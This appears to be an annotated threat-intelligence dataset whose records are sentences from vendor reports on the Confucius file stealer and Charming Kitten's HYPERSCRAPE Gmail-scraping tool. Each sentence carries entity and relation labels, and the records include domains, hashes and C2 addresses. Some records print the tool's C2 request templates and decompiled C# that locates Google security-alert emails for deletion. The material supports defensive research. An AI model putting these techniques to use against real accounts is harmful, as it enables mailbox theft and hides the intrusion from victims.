-{"id":4323,"text":"If the victim enables macros, the malicious code will be loaded.","entities":[],"relations":[],"Comments":[]} -{"id":4324,"text":"If the victim enters any phone number and clicks “SUBMIT,” the text field will be replaced by the message “Phone Number Not Found.”","entities":[],"relations":[],"Comments":[]} -{"id":4325,"text":"Behind the scenes, a .NET DLL file named skfk.txt, which is filled with content found inside the “Comments” property of the document, is created in the temporary directory.","entities":[{"id":50127,"label":"FILEPATH","start_offset":41,"end_offset":49}],"relations":[],"Comments":[]} -{"id":4326,"text":"The file is then loaded in memory via PowerShell.","entities":[{"id":50128,"label":"tools","start_offset":38,"end_offset":48}],"relations":[],"Comments":[]} -{"id":4327,"text":"Stage 1 is a simple download & execute program.","entities":[],"relations":[],"Comments":[]} -{"id":4328,"text":"It downloads an ASCII file from the same domain and converts it into binary before loading it on to the memory and jump to a dynamic function.","entities":[],"relations":[],"Comments":[]} -{"id":4329,"text":"Stage 2 is also .NET DLL file that downloads a third file from parinari[.]xyz, converts it from ASCII to binary, and then creates a scheduled task to load it.","entities":[{"id":50129,"label":"DOMAIN","start_offset":63,"end_offset":77}],"relations":[],"Comments":[]} -{"id":4330,"text":"Stage 3 is similar to stage 1, with the only change being the URL to retrieve the next stage.","entities":[],"relations":[],"Comments":[]} -{"id":4331,"text":"Stage 4 is the final payload (analyzed in the next section).","entities":[],"relations":[],"Comments":[]} -{"id":4332,"text":"it is never written in clear text to the file disk.","entities":[],"relations":[],"Comments":[]} -{"id":4333,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":4334,"text":"File stealer loading scheme ","entities":[],"relations":[],"Comments":[]} -{"id":4335,"text":"It should be noted that most of the compilation timestamps of these DLL files have been modified by the attacker to a year in the far future (2060, 2099 …), and the server IP addresses are often hidden behind CloudFlare.","entities":[{"id":50130,"label":"SOFTWARE","start_offset":209,"end_offset":219}],"relations":[],"Comments":[]} -{"id":4336,"text":"Analysis of the file stealer","entities":[],"relations":[],"Comments":[]} -{"id":4337,"text":"The final payload is a .NET DLL file designed to steal documents and images with the following extensions: File extension Description TXT Text file PDF PDF file PNG Image file in PNG format JPG Image file in JPG format DOC Word document XLS Excel document XLM Excel document with macros ODP OpenDocument Presentation ODS OpenDocument Sheet ODT OpenDocument Text RTF Rich Text Format file PPT PowerPoint document XLSX Excel document XLSM Excel document with macros DOCX Word document PPTX PowerPoint document JPEG Image file in JPEG format ","entities":[],"relations":[],"Comments":[]} -{"id":4338,"text":"The “Documents,” “Downloads,” “Desktop,” and “Pictures” folders of every user","entities":[],"relations":[],"Comments":[]} -{"id":4339,"text":"are checked.","entities":[],"relations":[],"Comments":[]} -{"id":4340,"text":"The DLL file also examines drives other than C:","entities":[],"relations":[],"Comments":[]} -{"id":4341,"text":". Figure 4. Code showing the main function of the file stealer ","entities":[],"relations":[],"Comments":[]} -{"id":4342,"text":"When a file matching one of the listed extensions is found, its MD5 hash is calculated and compared to an exclusion list retrieved from the command-and-control (C&C) server pirnaram[.]xyz.","entities":[{"id":50131,"label":"DOMAIN","start_offset":173,"end_offset":187}],"relations":[],"Comments":[]} -{"id":4343,"text":"If the hash is not listed, the file is sent via the C&C to a directory named after the concatenation of the machine name and the username.","entities":[],"relations":[],"Comments":[]} -{"id":4344,"text":"The exclusion list is different for every machine name-username string.","entities":[],"relations":[],"Comments":[]} -{"id":4345,"text":"Other campaigns","entities":[],"relations":[],"Comments":[]} -{"id":4346,"text":"During our monitoring of Confucius, we came across a campaign delivering the same payload, using a different lure.","entities":[],"relations":[],"Comments":[]} -{"id":4347,"text":"In this instance, the campaign impersonated the Pakistani Defense Housing Authority.","entities":[{"id":50132,"label":"identity","start_offset":48,"end_offset":83}],"relations":[],"Comments":[]} -{"id":4348,"text":"Again, this threat actor’s interest in military personnel is obvious.","entities":[],"relations":[],"Comments":[]} -{"id":4349,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":4350,"text":"Spear-phishing email from early August","entities":[{"id":50133,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":50134,"label":"TIME","start_offset":26,"end_offset":38}],"relations":[],"Comments":[]} -{"id":4351,"text":" The lures used in an older campaign from April 2021 impersonated the Federal Board of Revenue.","entities":[{"id":50135,"label":"TIME","start_offset":45,"end_offset":55},{"id":50136,"label":"identity","start_offset":73,"end_offset":97}],"relations":[],"Comments":[]} -{"id":4352,"text":"There were minor differences in tools, tactics, and procedures: the malicious document was directly attached to the spear phishing email — still encrypted — and the decryption password was sent in a different email.","entities":[{"id":50137,"label":"attack-pattern","start_offset":116,"end_offset":130}],"relations":[],"Comments":[]} -{"id":4353,"text":"The first stage was also hidden in the “Comments” section.","entities":[],"relations":[],"Comments":[]} -{"id":4354,"text":"However, the second stage contained the final payload, which was once again a file stealer with the exact same structure (a .NET DLL).","entities":[],"relations":[],"Comments":[]} -{"id":4355,"text":"Instead of exfiltrating the files through PHP scripts, they were done via FTP server.","entities":[],"relations":[],"Comments":[]} -{"id":4356,"text":"It should be noted that in some occasions, the threat actor sent spear-phishing emails from the domain name mailerservice[.]directory which we attributed to the Patchwork threat actor in previous research.","entities":[{"id":50138,"label":"attack-pattern","start_offset":65,"end_offset":79},{"id":50139,"label":"DOMAIN","start_offset":108,"end_offset":133},{"id":50140,"label":"threat-actor","start_offset":161,"end_offset":170}],"relations":[{"id":919,"from_id":50139,"to_id":50140,"type":"attributed-to"}],"Comments":[]} -{"id":4357,"text":"We disclosed multiple links between Patchwork and Confucius threat actors in the past, so this came as no surprise to us.","entities":[{"id":50141,"label":"threat-actor","start_offset":36,"end_offset":45},{"id":50142,"label":"threat-actor","start_offset":50,"end_offset":59}],"relations":[],"Comments":[]} -{"id":4358,"text":" The creative use of social engineering lures and how to defend against them","entities":[{"id":50143,"label":"attack-pattern","start_offset":21,"end_offset":45}],"relations":[],"Comments":[]} -{"id":4359,"text":"In our previous research, we already found Confucius, which is known for targeting Pakistan military for espionage purposes, employing multiple file stealers.","entities":[{"id":50144,"label":"threat-actor","start_offset":43,"end_offset":52},{"id":50145,"label":"identity","start_offset":83,"end_offset":100}],"relations":[],"Comments":[]} -{"id":4360,"text":"While the code quality of its payloads is not of the highest standard, this threat actor uses innovative techniques when crafting its malicious documents, such as hiding malicious code in the comments section, or using encrypted documents to prevent automatic analysis.","entities":[],"relations":[],"Comments":[]} -{"id":4361,"text":"Therefore, it’s highly likely that Confucius will continue to experiment and try out different kinds of social engineering lures in future campaigns.","entities":[],"relations":[],"Comments":[]} -{"id":4362,"text":"Despite the variety of lures used by the threat actor, best security practices still apply to these attacks.","entities":[],"relations":[],"Comments":[]} -{"id":4363,"text":"Users should always be wary and avoid clicking on any link or downloading any file from unsolicited emails or suspicious sources.","entities":[{"id":50146,"label":"attack-pattern","start_offset":62,"end_offset":128}],"relations":[],"Comments":[]} -{"id":4364,"text":"Red flags such as unusual sender domains or grammatical and spelling errors are also a sign that the email is malicious in nature, or at the very least, should be approached with proper security protocols in mind.","entities":[],"relations":[],"Comments":[]} -{"id":4365,"text":"The following security solutions can also protect users from email-based attacks: Trend Micro™ Cloud App Security – Enhances the security of Microsoft Office 365 and other cloud services via computer vision and real-time scanning.","entities":[{"id":50148,"label":"SOFTWARE","start_offset":142,"end_offset":162},{"id":50147,"label":"SOFTWARE","start_offset":83,"end_offset":114}],"relations":[],"Comments":[]} -{"id":4366,"text":"It also protects organizations from email-based threats.","entities":[],"relations":[],"Comments":[]} -{"id":4367,"text":"Trend Micro™ Deep Discovery™ Email Inspector – Defends users through a combination of real-time scanning and advanced analysis techniques for known and unknown attacks. Indicators of Compromise Hashes of the malicious encrypted documents: SHA256 Detection name dacf7868a71440a7d7d8797caca1aa29b7780801e6f3b3bc33123f16989354b2 Trojan.W97M.CONFUCIUS.A 0f6bcbdf4d192f8273887f9858819dd4690397a92fb28a60bb731c873c438e07 Trojan.W97M.CONFUCIUS.B","entities":[{"id":50153,"label":"malware","start_offset":428,"end_offset":451},{"id":50149,"label":"SOFTWARE","start_offset":0,"end_offset":28},{"id":50150,"label":"SHA2","start_offset":271,"end_offset":335},{"id":50151,"label":"malware","start_offset":337,"end_offset":360},{"id":50152,"label":"SHA2","start_offset":362,"end_offset":426}],"relations":[{"id":920,"from_id":50150,"to_id":50151,"type":"indicates"},{"id":921,"from_id":50152,"to_id":50153,"type":"indicates"}],"Comments":[]} -{"id":4368,"text":"508bcc1f3906f5641116cde26b830b43f38f9c68a32b67e03a3e7e3f920b1f4a","entities":[{"id":13098,"label":"SHA2","start_offset":0,"end_offset":64}],"relations":[],"Comments":[]} -{"id":4369,"text":" Trojan.W97M.CONFUCIUS.B 654c7021a4482da21e149ded58643b279ffbce66badf1a0a7fc3551acd607312 Trojan.W97M.CONFUCIUS.C 712172b5b1895bbfcced961a83baa448e26e93e301be407e6b9dc8cb6526277f Trojan.Win32.DLOADR.TIOIBELQ","entities":[{"id":13099,"label":"SHA2","start_offset":26,"end_offset":90},{"id":13100,"label":"SHA2","start_offset":117,"end_offset":181},{"id":50154,"label":"malware","start_offset":1,"end_offset":24},{"id":50155,"label":"malware","start_offset":92,"end_offset":115},{"id":50156,"label":"malware","start_offset":183,"end_offset":211}],"relations":[{"id":922,"from_id":13099,"to_id":50154,"type":"indicates"},{"id":923,"from_id":13100,"to_id":50155,"type":"indicates"}],"Comments":[]} -{"id":4370,"text":" URLs\/Domains\/IP Addresses Server hosting malicious documents parinari[.]xyz Server used for file exfiltration pirnaram[.]xyz Domain names linked to other campaigns","entities":[{"id":50157,"label":"DOMAIN","start_offset":73,"end_offset":87},{"id":50158,"label":"DOMAIN","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} -{"id":4371,"text":" pemra[.]email ispr[.]email fbr[.]news defencepk[.]email pakistanarmy[.]email pmogovpk[.]email mailerservice[.]directory file-dnld[.]com funtifu[.]live cnic-update[.]com cnic-ferify[.]live fbr-update[.]com download.fbr[.]tax support-team[.]tech api.priveetalk[.]com Sender email addresses latest_info@fbr.news notice@fbr.news alert@fbr.news thenewsinernational@mailerservice.directory","entities":[{"id":13101,"label":"EMAIL","start_offset":314,"end_offset":334},{"id":13102,"label":"EMAIL","start_offset":336,"end_offset":351},{"id":13103,"label":"EMAIL","start_offset":353,"end_offset":367},{"id":13104,"label":"EMAIL","start_offset":369,"end_offset":412},{"id":50166,"label":"DOMAIN","start_offset":128,"end_offset":143},{"id":50167,"label":"DOMAIN","start_offset":145,"end_offset":159},{"id":50161,"label":"DOMAIN","start_offset":30,"end_offset":40},{"id":50162,"label":"DOMAIN","start_offset":42,"end_offset":59},{"id":50163,"label":"DOMAIN","start_offset":61,"end_offset":81},{"id":50164,"label":"DOMAIN","start_offset":83,"end_offset":99},{"id":50159,"label":"DOMAIN","start_offset":1,"end_offset":14},{"id":50160,"label":"DOMAIN","start_offset":16,"end_offset":28},{"id":50165,"label":"DOMAIN","start_offset":101,"end_offset":126},{"id":50171,"label":"DOMAIN","start_offset":218,"end_offset":236},{"id":50172,"label":"DOMAIN","start_offset":238,"end_offset":257},{"id":50168,"label":"DOMAIN","start_offset":161,"end_offset":178},{"id":50169,"label":"DOMAIN","start_offset":180,"end_offset":198},{"id":50170,"label":"DOMAIN","start_offset":200,"end_offset":216},{"id":50173,"label":"DOMAIN","start_offset":259,"end_offset":279}],"relations":[],"Comments":[]} -{"id":4372,"text":" Tags APT & Targeted Attacks | Cyber Crime | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} -{"id":4373,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users.","entities":[{"id":50174,"label":"identity","start_offset":11,"end_offset":14},{"id":50178,"label":"identity","start_offset":162,"end_offset":180},{"id":50175,"label":"identity","start_offset":55,"end_offset":61},{"id":50176,"label":"threat-actor","start_offset":132,"end_offset":137},{"id":50177,"label":"threat-actor","start_offset":142,"end_offset":157}],"relations":[{"id":924,"from_id":50177,"to_id":50178,"type":"attributed-to"},{"id":925,"from_id":50176,"to_id":50177,"type":"duplicate-of"}],"Comments":[]} -{"id":4374,"text":"For years, we have been countering this group’s efforts to hijack accounts, deploy malware, and their use of novel techniques to conduct espionage aligned with the interests of the Iranian government.","entities":[{"id":50179,"label":"attack-pattern","start_offset":59,"end_offset":74},{"id":50181,"label":"identity","start_offset":181,"end_offset":199},{"id":50180,"label":"attack-pattern","start_offset":76,"end_offset":90}],"relations":[],"Comments":[]} -{"id":4375,"text":"Now, we’re shining light on a new tool of theirs.","entities":[],"relations":[],"Comments":[]} -{"id":4376,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":13122,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":50182,"label":"TIME","start_offset":3,"end_offset":16},{"id":50183,"label":"identity","start_offset":18,"end_offset":21},{"id":50188,"label":"attack-pattern","start_offset":90,"end_offset":105},{"id":50186,"label":"SOFTWARE","start_offset":118,"end_offset":124},{"id":50184,"label":"malware","start_offset":69,"end_offset":80},{"id":50185,"label":"SOFTWARE","start_offset":111,"end_offset":116},{"id":50187,"label":"SOFTWARE","start_offset":130,"end_offset":147}],"relations":[{"id":926,"from_id":50184,"to_id":13122,"type":"authored-by"},{"id":927,"from_id":50184,"to_id":50188,"type":"uses"},{"id":928,"from_id":50184,"to_id":50185,"type":"targets"},{"id":929,"from_id":50184,"to_id":50186,"type":"targets"},{"id":930,"from_id":50184,"to_id":50187,"type":"targets"}],"Comments":[]} -{"id":4377,"text":"The attacker runs HYPERSCRAPE on their own machine to download victims’ inboxes using previously acquired credentials.","entities":[{"id":50189,"label":"malware","start_offset":18,"end_offset":29}],"relations":[],"Comments":[]} -{"id":4379,"text":"The oldest known sample is from 2020, and the tool is still under active development.","entities":[{"id":50191,"label":"TIME","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} -{"id":4380,"text":"We have taken actions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.","entities":[],"relations":[],"Comments":[]} -{"id":4381,"text":"This post will provide technical details about HYPERSCRAPE, similar to PWC’s recently published analysis on a Telegram grabber tool.","entities":[{"id":50192,"label":"malware","start_offset":47,"end_offset":58},{"id":50194,"label":"malware","start_offset":110,"end_offset":131},{"id":50193,"label":"identity","start_offset":71,"end_offset":75}],"relations":[],"Comments":[]} -{"id":4382,"text":"HYPERSCRAPE demonstrates Charming Kitten’s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":13145,"label":"threat-actor","start_offset":25,"end_offset":40},{"id":50195,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":4383,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives.","entities":[{"id":50196,"label":"malware","start_offset":28,"end_offset":39},{"id":50197,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[{"id":931,"from_id":50197,"to_id":50196,"type":"uses"}],"Comments":[]} -{"id":4384,"text":" HYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired.","entities":[{"id":50198,"label":"malware","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} -{"id":4385,"text":"It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail.","entities":[{"id":50199,"label":"SOFTWARE","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} -{"id":4386,"text":"Once logged in, the tool changes the account’s language settings to English and iterates through the contents of the mailbox, individually downloading messages as .eml files and marking them unread.","entities":[],"relations":[],"Comments":[]} -{"id":4387,"text":"After the program has finished downloading the inbox, it reverts the language back to its original settings and deletes any security emails from Google.","entities":[{"id":50200,"label":"SOFTWARE","start_offset":145,"end_offset":151}],"relations":[],"Comments":[]} -{"id":4388,"text":"Earlier versions contained the option to request data from Google Takeout, a feature which allows users to export their data to a downloadable archive file.","entities":[{"id":50201,"label":"SOFTWARE","start_offset":59,"end_offset":73}],"relations":[],"Comments":[]} -{"id":4389,"text":"The tool is written in .NET for Windows PCs and is designed to run on the attacker's machine.","entities":[{"id":50202,"label":"SOFTWARE","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} -{"id":4390,"text":"We tested HYPERSCRAPE in a controlled environment with a test Gmail Account, although functionality may differ for Yahoo! and Microsoft accounts.","entities":[{"id":50203,"label":"malware","start_offset":10,"end_offset":21}],"relations":[],"Comments":[]} -{"id":4391,"text":"HYPERSCRAPE won't run unless in a directory with other file dependencies.","entities":[{"id":50204,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":4392,"text":"When launched, the tool makes an HTTP GET request to a C2 to check for a response body of \"OK'' and will terminate if it's not found.","entities":[],"relations":[],"Comments":[]} -{"id":4393,"text":"In the version tested, the C2 was unobfuscated and stored as a hardcoded string.","entities":[],"relations":[],"Comments":[]} -{"id":4394,"text":"In later versions it was obfuscated with Base64.","entities":[],"relations":[],"Comments":[]} -{"id":4395,"text":"GET http:\/\/{C2}\/Index.php?Ck=OK HTTP\/1.1","entities":[{"id":50205,"label":"URL","start_offset":4,"end_offset":31}],"relations":[],"Comments":[]} -{"id":4396,"text":"Host: {C2}","entities":[],"relations":[],"Comments":[]} -{"id":4397,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} -{"id":4398,"text":"The tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string to a valid cookie file.","entities":[],"relations":[],"Comments":[]} -{"id":4399,"text":"A new form is displayed if the information is not provided via command prompt.","entities":[],"relations":[],"Comments":[]} -{"id":4400,"text":"Once provided, the data in the \"Identity\" field is sent to a C2 for confirmation.","entities":[],"relations":[],"Comments":[]} -{"id":4401,"text":"Again, the response is expected to be \"OK\".","entities":[],"relations":[],"Comments":[]} -{"id":4402,"text":"GET http:\/\/{C2}\/Index.php?vubc={identity} HTTP\/1.1","entities":[{"id":13184,"label":"URL","start_offset":4,"end_offset":40}],"relations":[],"Comments":[]} -{"id":4403,"text":"Host: {C2} Accept-Encoding: gzip","entities":[],"relations":[],"Comments":[]} -{"id":4404,"text":"If the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and drop.","entities":[],"relations":[],"Comments":[]} -{"id":4405,"text":"After parsing, the cookies are inserted into a local cache used by the embedded web browser.","entities":[],"relations":[],"Comments":[]} -{"id":4406,"text":"A new folder named \"Download\" is created adjacent to the main binary.","entities":[],"relations":[],"Comments":[]} -{"id":4407,"text":"The browser then navigates to Gmail to begin the data collection.","entities":[],"relations":[],"Comments":[]} -{"id":4408,"text":"The user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the attacker to enable the basic HTML view in Gmail.","entities":[{"id":50206,"label":"SOFTWARE","start_offset":157,"end_offset":162}],"relations":[],"Comments":[]} -{"id":4409,"text":"If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.","entities":[],"relations":[],"Comments":[]} -{"id":4410,"text":"Once the attacker has logged in to the victim’s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not.","entities":[{"id":50207,"label":"malware","start_offset":57,"end_offset":68}],"relations":[],"Comments":[]} -{"id":4411,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} -{"id":4412,"text":"HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download.","entities":[{"id":50208,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":4413,"text":"It does the following for each email found: The emails are saved with \".eml\" extensions under the Downloads directory with the filename corresponding to the subject.","entities":[],"relations":[],"Comments":[]} -{"id":4414,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} -{"id":4415,"text":"When finished, a HTTP POST request is made to the C2 to relay the status and system information.","entities":[],"relations":[],"Comments":[]} -{"id":4416,"text":"The downloaded emails are not sent to the C2.","entities":[],"relations":[],"Comments":[]} -{"id":4417,"text":"POST http:\/\/{C2}\/?Key={GUID}&Crc={Identifier} { \"appName\": \"Gmail Downloader\", \"targetname\": \"{Email}\", \"HostName\": \"REDACTED\", \"srcUserIP\": \"REDACTED\", \"actionType\": \"First\", \"timeOccurrence\": \"05\/01\/2022 05:50:31 PM\", \"OS\": \"REDACTED\", \"OSVersion\": \"REDACTED\", \"SystemModel\": \"REDACTED\", \"SystemType\": \"REDACTED\", \"srcName\": \"REDACTED\", \"srcOrgName\": \"REDACTED\" }","entities":[{"id":13209,"label":"URL","start_offset":5,"end_offset":44},{"id":13211,"label":"TIME","start_offset":206,"end_offset":217}],"relations":[],"Comments":[]} -{"id":4418,"text":"The program will delete any security emails from Google generated by the attacker’s activity.","entities":[{"id":50209,"label":"SOFTWARE","start_offset":49,"end_offset":55}],"relations":[],"Comments":[]} -{"id":4419,"text":"private bool IsThereAnyEMail() { List < GeckoHtmlElement > list = (from x in this.geckoWebBrowser.Document.GetElementsByTagName(\"span\") where x.TextContent.StartsWith (\"Security alert\") || x.TextContent.StartsWith(\"Archive of Google data requested\") || x.TextContent.StartsWith(\"Your Google data archive is ready\") || x.TextContent.StartsWith(\"Your Google data is ready\") || x.TextContent.StartsWith(\"Critical security alert\") ||","entities":[],"relations":[],"Comments":[]} -{"id":4420,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") ||","entities":[],"relations":[],"Comments":[]} -{"id":4421,"text":"x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.","entities":[],"relations":[],"Comments":[]} -{"id":4422,"text":"StartsWith(\"Help us protect you: Security advice from Google\")","entities":[],"relations":[],"Comments":[]} -{"id":4423,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} -{"id":4424,"text":"GeckoHtmlElement > (","entities":[],"relations":[],"Comments":[]} -{"id":4425,"text":"; bool flag = list.Count == 0; return !flag; }","entities":[],"relations":[],"Comments":[]} -{"id":4426,"text":"Data from Google Takeout is also available upon request, but the option was only found in early builds.","entities":[{"id":50210,"label":"SOFTWARE","start_offset":10,"end_offset":24}],"relations":[],"Comments":[]} -{"id":4427,"text":"The functionality was not automated and it's unclear why it was removed in later versions.","entities":[],"relations":[],"Comments":[]} -{"id":4428,"text":"When conducting a Takeout, the program will spawn a new copy of itself and initialize a pipe communication channel to relay the cookies and account name, both of which are required to accomplish the Takeout.","entities":[],"relations":[],"Comments":[]} -{"id":4429,"text":"When they are received, the browser navigates to the official Takeout link to request and eventually download the exported data.","entities":[],"relations":[],"Comments":[]} -{"id":4430,"text":"public void ManageTakeOut() { string text = \"PipeName\";","entities":[],"relations":[],"Comments":[]} -{"id":4431,"text":"Process process = new Process(); process.StartInfo.Arguments = string.Format(\"PIPE Google \\\"{0}\\\"\", text); process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName; process.Start();","entities":[],"relations":[],"Comments":[]} -{"id":4432,"text":"PipeCommunication pipeCommunication = new PipeCommunication(true, text); bool flag = false; while (!flag)","entities":[],"relations":[],"Comments":[]} -{"id":4433,"text":"{ try { JsonInfo jsonInfo = pipeCommunication.Read(); switch (jsonInfo.Type) { case JsonType.GetCookies: jsonInfo.Data = this.CookieText; pipeCommunication.Write(jsonInfo); break; case JsonType.TakeOutFile: flag = true; break; case JsonType.GetUsername: while (this.OperationObject.GetUsername() == null) { Thread.Sleep(1000); }","entities":[],"relations":[],"Comments":[]} -{"id":4434,"text":"jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }","entities":[],"relations":[],"Comments":[]} -{"id":4435,"text":"catch (Exception) { bool hasExited = process.HasExited; if (hasExited) { flag = true; } }","entities":[],"relations":[],"Comments":[]} -{"id":4436,"text":"pipeCommunication.Close(); }","entities":[],"relations":[],"Comments":[]} -{"id":4437,"text":"TAG is committed to sharing research to raise awareness on bad actors like Charming Kitten within the security community, and for companies and individuals that may be targeted.","entities":[{"id":50211,"label":"identity","start_offset":0,"end_offset":3},{"id":50212,"label":"threat-actor","start_offset":75,"end_offset":90}],"relations":[],"Comments":[]} -{"id":4438,"text":"It’s why we do things like work with our CyberCrime Investigation Group to share critical information relevant to law enforcement.","entities":[{"id":50213,"label":"identity","start_offset":41,"end_offset":71}],"relations":[],"Comments":[]} -{"id":4439,"text":"We hope doing so will improve understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger protections across the industry.","entities":[],"relations":[],"Comments":[]} -{"id":4440,"text":"We’ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services.","entities":[],"relations":[],"Comments":[]} -{"id":4441,"text":"In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.","entities":[],"relations":[],"Comments":[]} -{"id":4442,"text":"C2s 136.243.108.14 173.209.51.54 HYPERSCRAPE binaries","entities":[{"id":50214,"label":"malware","start_offset":33,"end_offset":44},{"id":13275,"label":"IPV4","start_offset":4,"end_offset":18},{"id":13276,"label":"IPV4","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} -{"id":4443,"text":"03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6 cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa Microsoft Live DLL 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23 PDB E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\EmailDownloader\\obj\\Debug\\EmailDownloader.pdb E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\Mahdi\\LiveLib\\obj\\Release\\LiveLib.pdb","entities":[{"id":50215,"label":"FILEPATH","start_offset":608,"end_offset":715},{"id":50216,"label":"FILEPATH","start_offset":716,"end_offset":815},{"id":50217,"label":"identity","start_offset":520,"end_offset":529},{"id":13277,"label":"SHA2","start_offset":0,"end_offset":64},{"id":13281,"label":"SHA2","start_offset":260,"end_offset":324},{"id":13282,"label":"SHA2","start_offset":325,"end_offset":389},{"id":13283,"label":"SHA2","start_offset":390,"end_offset":454},{"id":13284,"label":"SHA2","start_offset":455,"end_offset":519},{"id":13278,"label":"SHA2","start_offset":65,"end_offset":129},{"id":13279,"label":"SHA2","start_offset":130,"end_offset":194},{"id":13280,"label":"SHA2","start_offset":195,"end_offset":259},{"id":13286,"label":"SHA2","start_offset":539,"end_offset":603}],"relations":[],"Comments":[]} -{"id":4444,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 2022.","entities":[{"id":50218,"label":"TIME","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} -{"id":4445,"text":"It was last updated on July 29, 2022.","entities":[{"id":50219,"label":"TIME","start_offset":23,"end_offset":36}],"relations":[],"Comments":[]} -{"id":4446,"text":" The following testimony was delivered to the U.S. House Intelligence Committee by Shane Huntley, Senior Director of Google’s Threat Analysis Group (TAG) on July 27, 2022. Chairman Schiff, Ranking Member Turner, and esteemed Members of the Committee: Thank you for the opportunity to appear before the Committee to discuss Google’s efforts to protect users from commercial spyware.","entities":[{"id":50220,"label":"identity","start_offset":46,"end_offset":79},{"id":50223,"label":"identity","start_offset":173,"end_offset":188},{"id":50221,"label":"identity","start_offset":83,"end_offset":153},{"id":50222,"label":"TIME","start_offset":157,"end_offset":170},{"id":50224,"label":"identity","start_offset":324,"end_offset":331}],"relations":[],"Comments":[]} -{"id":4447,"text":"We appreciate the Committee’s efforts to raise awareness about the commercial spyware industry that is thriving and growing, creating risks to Americans and Internet users across the globe.","entities":[],"relations":[],"Comments":[]} -{"id":4448,"text":" Google has been tracking the activities of commercial spyware vendors for years, and we have been taking critical steps to protect our users.","entities":[{"id":50225,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} -{"id":4449,"text":"We take the security of our users very seriously, and we have dedicated teams in place to protect against attacks from a wide range of sources.","entities":[],"relations":[],"Comments":[]} -{"id":4450,"text":"Our Threat Analysis Group, or TAG, is dedicated to protecting users from threats posed by state-sponsored malware attacks and other advanced persistent threats.","entities":[{"id":50226,"label":"identity","start_offset":4,"end_offset":25},{"id":50227,"label":"identity","start_offset":30,"end_offset":33}],"relations":[{"id":932,"from_id":50227,"to_id":50226,"type":"duplicate-of"}],"Comments":[]} -{"id":4451,"text":"TAG actively monitors threat actors and the evolution of their tactics and techniques.","entities":[{"id":50228,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":4452,"text":"For example, TAG has been closely tracking and disrupting campaigns targeting individuals and organizations in Ukraine, and frequently publishes reports on Russian threat actors.","entities":[{"id":50229,"label":"identity","start_offset":13,"end_offset":16},{"id":50230,"label":"location","start_offset":111,"end_offset":118},{"id":50231,"label":"location","start_offset":156,"end_offset":163}],"relations":[],"Comments":[]} -{"id":4453,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with our industry peers.","entities":[],"relations":[],"Comments":[]} -{"id":4454,"text":"We also publicly release information about the operations we disrupt, which is available to our government partners and the general public.","entities":[],"relations":[],"Comments":[]} -{"id":4455,"text":"TAG tracks and proactively counters serious state-sponsored and financially motivated information cyber 